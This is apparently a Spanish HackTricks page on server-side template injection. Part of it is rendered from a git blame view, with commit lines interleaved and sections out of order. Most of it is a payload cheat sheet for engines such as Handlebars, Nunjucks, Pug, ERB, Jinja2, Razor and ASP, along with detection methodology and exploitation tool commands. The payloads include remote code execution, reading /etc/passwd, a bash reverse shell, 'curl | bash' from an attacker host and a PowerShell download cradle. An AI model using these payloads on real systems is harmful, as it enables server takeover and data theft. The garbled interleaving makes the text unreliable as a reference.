{{this.push "return require('child_process').exec('whoami');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}

URLencoded:
%7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%0D%0A%20%20%7B%7B%23with%20%22e%22%7D%7D%0D%0A%20%20%20%20%7B%7B%23with%20split%20as%20%7Cconslist%7C%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epush%20%28lookup%20string%2Esub%20%22constructor%22%29%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%23with%20string%2Esplit%20as%20%7Ccodelist%7C%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epush%20%22return%20require%28%27child%5Fprocess%27%29%2Eexec%28%27whoami%27%29%3B%22%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%23each%20conslist%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%23with%20%28string%2Esub%2Eapply%200%20codelist%29%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%7Bthis%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%2Feach%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%7B%7B%2Fwith%7D%7D%0D%0A%7B%7B%2Fwith%7D%7D
```
**Más información**

* [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)

### JsRender (NodeJS)

| **Plantilla** | **Descripción**                         |
| ------------ | --------------------------------------- |
|              | Evaluar y renderizar la salida              |
|              | Evaluar y renderizar la salida codificada en HTML |
|              | Comentario                                 |
| y          | Permitir código (deshabilitado por defecto)        |

* \= 49

**Lado del Cliente**
```python
{{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}
```
**Lado del Servidor**
```bash
{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
```
**Más información**

* [https://appcheck-ng.com/template-injection-jsrender-jsviews/](https://appcheck-ng.com/template-injection-jsrender-jsviews/)

### PugJs (NodeJS)

* `#{7*7} = 49`
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}`
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}`

**Ejemplo de renderizado en el servidor**
```javascript
var pugjs = require('pug');
home = pugjs.render(injected_page)
```
**Más información**

* [https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/](https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/)

### NUNJUCKS (NodeJS) <a href="#nunjucks" id="nunjucks"></a>

* \{{7\*7\}} = 49
* \{{foo\}} = Sin salida
* \#{7\*7} = #{7\*7}
* \{{console.log(1)\}} = Error
```javascript
{{range.constructor("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")()}}
{{range.constructor("return global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/10.10.14.11/6767 0>&1\"')")()}}
```
**Más información**

* [http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine](http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine)

### ERB (Ruby)

* `{{7*7}} = {{7*7}}`
* `${7*7} = ${7*7}`
* `<%= 7*7 %> = 49`
* `<%= foobar %> = Error`
```python
<%= system("whoami") %> #Execute code
<%= Dir.entries('/') %> #List folder
<%= File.open('/etc/passwd').read %> #Read file

<%= system('cat /etc/passwd') %>
<%= `ls /` %>
<%= IO.popen('ls /').readlines()  %>
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
```
**Más información**

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby)

### Slim (Ruby)

* `{ 7 * 7 }`
```
{ %x|env| }
```
**Más información**

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby)

### Python

Consulta la siguiente página para aprender trucos sobre **burlar las cajas de arena de ejecución de comandos arbitrarios** en python:

{% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %}
[bypass-python-sandboxes](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/)
{% endcontent-ref %}

### Tornado (Python)

* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
* `{{foobar}} = Error`
* `{{7*'7'}} = 7777777`
```python
{% raw %}
{% import foobar %} = Error
{% import os %}

{% import os %}
{% endraw %}


{{os.system('whoami')}}
{{os.system('whoami')}}
```
**Más información**

### Jinja2 (Python)

[Sitio web oficial](http://jinja.pocoo.org)

> Jinja2 es un motor de plantillas completo para Python. Tiene soporte completo para Unicode, un entorno de ejecución en sandbox opcional, ampliamente utilizado y con licencia BSD.

* `{{7*7}} = Error`
* `${7*7} = ${7*7}`
* `{{foobar}} Nada`
* `{{4*4}}[[5*5]]`
* `{{7*'7'}} = 7777777`
* `{{config}}`
* `{{config.items()}}`
* `{{settings.SECRET_KEY}}`
* `{{settings}}`
* `<div data-gb-custom-block data-tag="debug"></div>`
```python
{% raw %}
{% debug %}
{% endraw %}


{{settings.SECRET_KEY}}
{{4*4}}[[5*5]]
{{7*'7'}} would result in 7777777
```
**Jinja2 - Formato de plantilla**
```python
{% raw %}
{% extends "layout.html" %}
{% block body %}
<ul>
{% for user in users %}
<li><a href="{{ user.url }}">{{ user.username }}</a></li>
{% endfor %}
</ul>
{% endblock %}
{% endraw %}


```
[**RCE no dependiente de**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__`:
```python
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}

# Or in the shotest versions:
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
```
**Más detalles sobre cómo abusar de Jinja**:

{% content-ref url="jinja2-ssti.md" %}
[jinja2-ssti.md](jinja2-ssti.md)
{% endcontent-ref %}

### Mako (Python)
```python
<%
import os
x=os.popen('id').read()
%>
${x}
```
### Razor (.Net)

* `@(2+2) <= Éxito`
* `@() <= Éxito`
* `@("{{código}}") <= Éxito`
* `@ <= Éxito`
* `@{} <= ¡ERROR!`
* `@{ <= ¡ERROR!`
* `@(1+2)`
* `@( //Código C# )`
* `@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");`
*   `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4MQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbw3AHMAXABUAGEAcwBrAHMAXAB0AGUAcw0AG0AZQB0ADYANAAuAGUAeABlAA==");`

El método `System.Diagnostics.Process.Start` de .NET se puede utilizar para iniciar cualquier proceso en el servidor y así crear un webshell. Puedes encontrar un ejemplo de una aplicación web vulnerable en [https://github.com/cnotin/RazorVulnerableApp](https://github.com/cnotin/RazorVulnerableApp)

**Más información**

* [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-\(SSTI\)-in-ASP.NET-Razor/)
* [https://www.schtech.co.uk/razor-pages-ssti-rce/](https://www.schtech.co.uk/razor-pages-ssti-rce/)

### ASP

* `<%= 7*7 %>` = 49
* `<%= "foo" %>` = foo
* `<%= foo %>` = Nada
* `<%= response.write(date()) %>` = \<Date>
```bash
<%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
```
**Más Información**

* [https://www.w3schools.com/asp/asp\_examples.asp](https://www.w3schools.com/asp/asp\_examples.asp)

### Mojolicious (Perl)

Incluso si es perl, utiliza etiquetas como ERB en Ruby.

* `<%= 7*7 %> = 49`
* `<%= foobar %> = Error`
```
<%= perl code %>
<% perl code %>
```
### SSTI en GO

La forma de confirmar que el motor de plantillas utilizado en el backend es Go es mediante el uso de estos payloads:

* `{{ . }}` = estructura de datos pasada como entrada a la plantilla
* Si los datos pasados son un objeto que contiene el atributo Password por ejemplo, el payload anterior lo filtraría, pero también podrías hacer: `{{ .Password }}`
* `{{printf "%s" "ssti" }}` = debería mostrar la cadena ssti en la respuesta
* `{{html "ssti"}}`, `{{js "ssti"}}` = Estos son algunos otros payloads que deberían mostrar la cadena "ssti" sin las palabras finales "js" o "html". Puedes consultar más palabras clave en el motor [aquí](https://golang.org/pkg/text/template).

**Explotación de XSS**

Si el servidor está **utilizando el paquete text/template**, XSS es muy fácil de lograr simplemente proporcionando tu **payload** como entrada. Sin embargo, eso **no es el caso con html/template** ya que codifica en HTML la respuesta: `{{"<script>alert(1)</script>"}}` --> `&lt;script&gt;alert(1)&lt;/script&gt;`

Sin embargo, Go permite **DEFINIR** una **plantilla** completa y luego **llamarla más tarde**. El payload sería algo así:\
`{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}}`

**Explotación de RCE**

La documentación tanto para el módulo html/template se puede encontrar [aquí](https://golang.org/pkg/html/template/), y la documentación para el módulo text/template se puede encontrar [aquí](https://golang.org/pkg/text/template/), y sí, varían mucho. Por ejemplo, en **text/template**, puedes **llamar directamente a cualquier función pública con el valor "call"**, sin embargo, esto no es posible con html/template.

Si deseas encontrar una RCE en Go a través de SSTI, debes saber que al poder acceder al objeto dado a la plantilla con `{{ . }}`, también puedes **llamar a los métodos de los objetos**. Entonces, imagina que el **objeto pasado tiene un método llamado System** que ejecuta el comando dado, podrías abusar de él con: `{{ .System "ls" }}`\
Por lo tanto, probablemente **necesitarás el código fuente**. Un código fuente potencial para algo así se vería así:
```go
func (p Person) Secret (test string) string {
out, _ := exec.Command(test).CombinedOutput()
return string(out)
}
```
**Más información**

* [https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html](https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html)
* [https://www.onsecurity.io/blog/go-ssti-method-research/](https://www.onsecurity.io/blog/go-ssti-method-research/)

### Más exploits

Consulta el resto de [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) para más exploits. También puedes encontrar información interesante sobre etiquetas en [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)

## BlackHat PDF

{% file src="../../.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf" %}

## Ayuda relacionada

Si crees que podría ser útil, lee:

* [Trucos de Flask](../../network-services-pentesting/pentesting-web/flask.md)
* [Funciones mágicas de Python](broken-reference/)

## Herramientas

{% embed url="https://github.com/Hackmanit/TInjA" %}

{% embed url="https://github.com/vladko312/sstimap" %}

{% embed url="https://github.com/epinna/tplmap" %}

{% embed url="https://github.com/Hackmanit/template-injection-table" %}

## Lista de detección de fuerza bruta

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}

## Práctica y referencias

* [https://portswigger.net/web-security/server-side-template-injection/exploiting](https://portswigger.net/web-security/server-side-template-injection/exploiting)
* [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
* [**https://portswigger.net/web-security/server-side-template-injection**](https://portswigger.net/web-security/server-side-template-injection)

<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com/) es el evento de ciberseguridad más relevante en **España** y uno de los más importantes en **Europa**. Con **la misión de promover el conocimiento técnico**, este congreso es un punto de encuentro clave para profesionales de la tecnología y la ciberseguridad en todas las disciplinas.

{% embed url="https://www.rootedcon.com/" %}

<details>

<summary><strong>Aprende hacking en AWS desde cero hasta experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								# Inyección de plantillas en el lado del servidor (SSTI)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								<details>
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								<summary><strong>Aprende hacking en AWS desde cero hasta experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Experto en Red Team de AWS de HackTricks)</strong></a><strong>!</strong></summary>
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
+								Otras formas de apoyar a HackTricks:
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
 								* Obtén el [**swag oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
 								* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
+								* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* **Comparte tus trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								</details>
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								<figure><img src="../../.gitbook/assets/image (1) (3) (3).png" alt=""><figcaption></figcaption></figure>
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								[**RootedCON**](https://www.rootedcon.com) es el evento de ciberseguridad más relevante en **España** y uno de los más importantes en **Europa**. Con **la misión de promover el conocimiento técnico**, este congreso es un punto de encuentro crucial para profesionales de tecnología y ciberseguridad en todas las disciplinas.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								{% embed url="https://www.rootedcon.com/" %}
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								## ¿Qué es la inyección de plantillas en el lado del servidor?
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Una inyección de plantillas en el lado del servidor ocurre cuando un atacante es capaz de utilizar la sintaxis de plantillas nativas para inyectar un payload malicioso en una plantilla, que luego se ejecuta en el servidor.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Los **motores de plantillas** están diseñados para **generar páginas web** combinando plantillas **fijas** con datos **volátiles**. Los ataques de inyección de plantillas en el lado del servidor pueden ocurrir cuando la **entrada del usuario** se concatena directamente **en una plantilla**, en lugar de pasarse como datos. Esto permite a los atacantes **inyectar directivas de plantilla arbitrarias** para manipular el motor de plantillas, a menudo permitiéndoles tomar **control completo del servidor**.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Un ejemplo de código vulnerable se muestra a continuación:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```php
 								$output = $twig->render("Dear " . $_GET['name']);
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								En el ejemplo anterior **parte de la plantilla** en sí misma está siendo **generada dinámicamente** utilizando el parámetro `GET` `name`. Dado que la sintaxis de la plantilla se evalúa en el servidor, esto potencialmente permite a un atacante colocar un payload de inyección de plantilla en el servidor dentro del parámetro `name` de la siguiente manera:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```
 								http://vulnerable-website.com/?name={{bad-stuff-here}}
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								## Construyendo un ataque de inyección de plantillas en el servidor
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								![](../../.gitbook/assets/ssti-methodology-diagram.png)
 								### Detectar
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Al igual que con cualquier vulnerabilidad, el primer paso hacia la explotación es poder encontrarla. Quizás el enfoque inicial más simple sea intentar **fuzzear la plantilla** inyectando una secuencia de caracteres especiales comúnmente utilizados en expresiones de plantillas, como el políglota **`${{<%[%'"}}%\`.**\
 								Para verificar si el servidor es vulnerable, debes **detectar las diferencias** entre la respuesta con **datos regulares** en el parámetro y la **carga útil proporcionada**.\
 								Si se produce un **error**, será bastante fácil darse cuenta de que **el servidor es vulnerable** e incluso qué **motor está en ejecución**. Pero también podrías encontrar un servidor vulnerable si esperabas que **reflejara** la carga útil proporcionada y **no se está reflejando** o si faltan algunos **caracteres** en la respuesta.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
+								**Detectar - Contexto de texto plano**
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								La entrada proporcionada se está **renderizando y reflejando** en la respuesta. Esto puede ser fácilmente **confundido con una vulnerabilidad** de [**XSS**](../xss-cross-site-scripting/) simple, pero es fácil diferenciarlo si intentas establecer **operaciones matemáticas** dentro de una expresión de plantilla:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```
 								{{7*7}}
 								${7*7}
 								<%= 7*7 %>
 								${{7*7}}
 								#{7*7}
 								*{7*7}
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								**Detectar - Contexto del código**
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								En estos casos, la **entrada del usuario** se coloca **dentro** de una **expresión de plantilla**:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```python
 								engine.render("Hello {{"+greeting+"}}", data)
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								La URL de acceso a esa página podría ser similar a: `http://vulnerable-website.com/?greeting=data.username`
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Si **cambias** el parámetro **`greeting`** por un **valor diferente**, la **respuesta no contendrá el nombre de usuario**, pero si accedes a algo como: `http://vulnerable-website.com/?greeting=data.username}}hello` entonces, **la respuesta contendrá el nombre de usuario** (si los caracteres de cierre de la expresión de plantilla fueron **`}}`**).\
 								Si se produce un **error** durante estas pruebas, será más fácil detectar que el servidor es vulnerable.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['pentesting-web/ssti-server-side-template-injection/README.m

											
										
										
											2023-07-11 13:30:02 +00:00
+								### Identificar
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['pentesting-web/ssti-server-side-template-injection/README.m

											
										
										
											2023-07-11 13:30:02 +00:00
+								Una vez que hayas detectado el potencial de inyección de plantillas, el siguiente paso es identificar el motor de plantillas.\
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Aunque hay una gran cantidad de lenguajes de plantillas, muchos de ellos utilizan una sintaxis muy similar que se elige específicamente para no chocar con los caracteres HTML.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Si tienes suerte, el servidor estará **imprimiendo los errores** y podrás encontrar el **motor** utilizado **dentro** de los errores. Algunas cargas útiles posibles que pueden causar errores:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								| `${}`       | `{{}}`       | `<%= %>`        |
 								| ----------- | ------------ | --------------- |
 								| `${7/0}`    | `{{7/0}}`    | `<%= 7/0 %>`    |
 								| `${foobar}` | `{{foobar}}` | `<%= foobar %>` |
 								| `${7*7}`    | `{{7*7}}`    | \`\`            |
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								De lo contrario, deberás probar manualmente **diferentes cargas específicas del lenguaje** y estudiar cómo son interpretadas por el motor de plantillas. Una forma común de hacer esto es inyectar operaciones matemáticas arbitrarias utilizando la sintaxis de diferentes motores de plantillas. Luego puedes observar si se evalúan correctamente. Para ayudar en este proceso, puedes usar un árbol de decisiones similar al siguiente:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								![](<../../.gitbook/assets/image (272).png>)
-												Translated ['pentesting-web/ssti-server-side-template-injection/README.m

											
										
										
											2023-07-11 13:30:02 +00:00
+								### Explotar
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								**Leer**
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								El primer paso después de encontrar la inyección de plantillas e identificar el motor de plantillas es leer la documentación. Áreas clave de interés son:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* Secciones 'Para autores de plantillas' que cubren la sintaxis básica.
 								* 'Consideraciones de seguridad' - es probable que quien desarrolló la aplicación que estás probando no haya leído esto, y puede contener algunas pistas útiles.
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
+								* Listas de métodos, funciones, filtros y variables integrados.
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* Listas de extensiones/complementos - algunos pueden estar habilitados de forma predeterminada.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								**Explorar**
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Suponiendo que no se han presentado exploits, el siguiente paso es **explorar el entorno** para averiguar exactamente a qué **tienes acceso**. Puedes esperar encontrar tanto **objetos predeterminados** proporcionados por el motor de plantillas, como **objetos específicos de la aplicación** pasados a la plantilla por el desarrollador. Muchos sistemas de plantillas exponen un objeto 'self' o de espacio de nombres que contiene todo en el ámbito, y una forma idiomática de listar los atributos y métodos de un objeto.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Si no hay un objeto self integrado, tendrás que probar nombres de variables por fuerza bruta utilizando [SecLists](https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt) y la colección de listas de palabras de Burp Intruder.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Los objetos proporcionados por el desarrollador son particularmente propensos a contener información sensible, y pueden variar entre diferentes plantillas dentro de una aplicación, por lo que este proceso idealmente debería aplicarse a cada plantilla individualmente.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								**Atacar**
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								En este punto, deberías tener una **idea clara de la superficie de ataque** disponible y poder proceder con técnicas tradicionales de auditoría de seguridad, revisando cada función en busca de vulnerabilidades explotables. Es importante abordar esto en el contexto de la aplicación en general - algunas funciones pueden usarse para explotar características específicas de la aplicación. Los ejemplos a seguir utilizarán la inyección de plantillas para desencadenar la creación arbitraria de objetos, la lectura/escritura arbitraria de archivos, la inclusión remota de archivos, la divulgación de información y vulnerabilidades de escalada de privilegios.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								## Herramientas
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
+								### [TInjA](https://github.com/Hackmanit/TInjA)
 								un escáner eficiente de SSTI + CSTI que utiliza políglotos novedosos
 								```bash
 								tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
 								tinja url -u "http://example.com/" -d "username=Kirlia"  -c "PHPSESSID=ABC123..."
 								```
-												Translated ['pentesting-web/ssti-server-side-template-injection/README.m

											
										
										
											2024-01-10 22:20:21 +00:00
+								### [SSTImap](https://github.com/vladko312/sstimap)
 								```bash
 								python3 sstimap.py -i -l 5
 								python3 sstimap.py -u "http://example.com/ --crawl 5 --forms
 								python3 sstimap.py -u 'https://example.com/page?name=John' -s
 								```
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								### [Tplmap](https://github.com/epinna/tplmap)
 								```python
 								python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
 								python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
 								python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
 								```
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
+								### [Tabla de Inyección de Plantillas](https://github.com/Hackmanit/template-injection-table)
 								una tabla interactiva que contiene los políglotos de inyección de plantillas más eficientes junto con las respuestas esperadas de los 44 motores de plantillas más importantes.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								## Exploits
 								### Genérico
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-01-15 10:43:04 +00:00
+								En esta **lista de palabras** puedes encontrar **variables definidas** en los entornos de algunos de los motores mencionados a continuación:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
